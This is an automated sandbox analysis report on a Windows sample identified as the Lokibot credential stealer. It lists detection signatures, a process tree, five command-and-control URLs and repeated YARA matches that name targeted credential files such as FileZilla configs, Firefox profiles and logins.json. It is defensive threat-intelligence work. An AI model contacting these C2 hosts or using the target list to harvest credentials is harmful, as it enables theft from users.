Edit tour

Windows Analysis Report
ZciowjM9hN

Overview

General Information

Sample Name:	ZciowjM9hN (renamed file extension from none to exe)
Analysis ID:	642374
MD5:	4015330da10de30bcdf2b65f7f98baeb
SHA1:	bae6c45444103bab44973983c444e7293a5d30ca
SHA256:	9838ba34c89432853bf5f65e0dd54f4f5ca540e886a18b31ab96b007dcbf05d5
Tags:	32exetrojan
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Lokibot

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Snort IDS alert for network traffic

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Yara detected aPLib compressed binary

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to steal Mail credentials (via file registry)

Machine Learning detection for sample

Injects a PE file into a foreign processes

C2 URLs / IPs found in malware configuration

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Sample file is different than original file name gathered from version info

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

ZciowjM9hN.exe (PID: 6328 cmdline: "C:\Users\user\Desktop\ZciowjM9hN.exe" MD5: 4015330DA10DE30BCDF2B65F7F98BAEB)

ZciowjM9hN.exe (PID: 6976 cmdline: C:\Users\user\Desktop\ZciowjM9hN.exe MD5: 4015330DA10DE30BCDF2B65F7F98BAEB)

cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://vmopahtqdf84hfvsqepalcbcch63gdyvah.ml/BN2/fre.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.320864027.0000000003C05000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1346f:$des3: 68 03 66 00 00 0x17860:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1792c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000009.00000002.544621868.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000009.00000000.316135855.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000002.545669843.00000000016A8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000000.00000002.323829302.0000000007470000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x51d3f:$s1: file:/// 0x51c4f:$s2: {11111-22222-10009-11112} 0x51ccf:$s3: {11111-22222-50001-00000} 0x4f119:$s4: get_Module 0x4f55f:$s5: Reverse 0x5157e:$s6: BlockCopy 0x513c2:$s7: ReadByte 0x51d51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000009.00000000.314966442.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.319434255.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x5e6a7:$des3: 68 03 66 00 00 0x63040:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x6310c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.319718686.0000000002DFB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.320545406.0000000003B81000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x7d44f:$des3: 68 03 66 00 00 0x81840:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x8190c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000009.00000000.315757922.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000009.00000000.316822749.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: ZciowjM9hN.exe PID: 6328	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ZciowjM9hN.exe PID: 6328	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ZciowjM9hN.exe PID: 6328	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: ZciowjM9hN.exe PID: 6976	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: ZciowjM9hN.exe PID: 6976	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: ZciowjM9hN.exe PID: 6976	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Click to see the 47 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.ZciowjM9hN.exe.3beb450.6.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
9.2.ZciowjM9hN.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.ZciowjM9hN.exe.7470000.9.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4ff3f:$s1: file:/// 0x4fe4f:$s2: {11111-22222-10009-11112} 0x4fecf:$s3: {11111-22222-50001-00000} 0x4d319:$s4: get_Module 0x4d75f:$s5: Reverse 0x4f77e:$s6: BlockCopy 0x4f5c2:$s7: ReadByte 0x4ff51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.0.ZciowjM9hN.exe.400000.10.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.10.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.10.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.10.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.10.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.10.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.10.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.12.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.3.ZciowjM9hN.exe.3d39ed0.1.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x4ff3f:$s1: file:/// 0x4fe4f:$s2: {11111-22222-10009-11112} 0x4fecf:$s3: {11111-22222-50001-00000} 0x4d319:$s4: get_Module 0x4d75f:$s5: Reverse 0x4f77e:$s6: BlockCopy 0x4f5c2:$s7: ReadByte 0x4ff51:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
9.0.ZciowjM9hN.exe.400000.12.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.12.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.12.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.12.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.12.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.12.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.4.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.4.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.4.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.4.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
9.0.ZciowjM9hN.exe.400000.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
9.0.ZciowjM9hN.exe.400000.8.unpack	SUSP_XORed_URL_in_EXE	Detects an XORed URL in an executable	Florian Roth	0x13e78:$s1: http:// 0x17633:$s1: http:// 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0 0x13e80:$s2: https:// 0x13e78:$f1: http:// 0x17633:$f1: http:// 0x13e80:$f2: https://
9.0.ZciowjM9hN.exe.400000.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.0.ZciowjM9hN.exe.400000.8.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
9.0.ZciowjM9hN.exe.400000.8.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
9.0.ZciowjM9hN.exe.400000.8.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
9.0.ZciowjM9hN.exe.400000.8.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
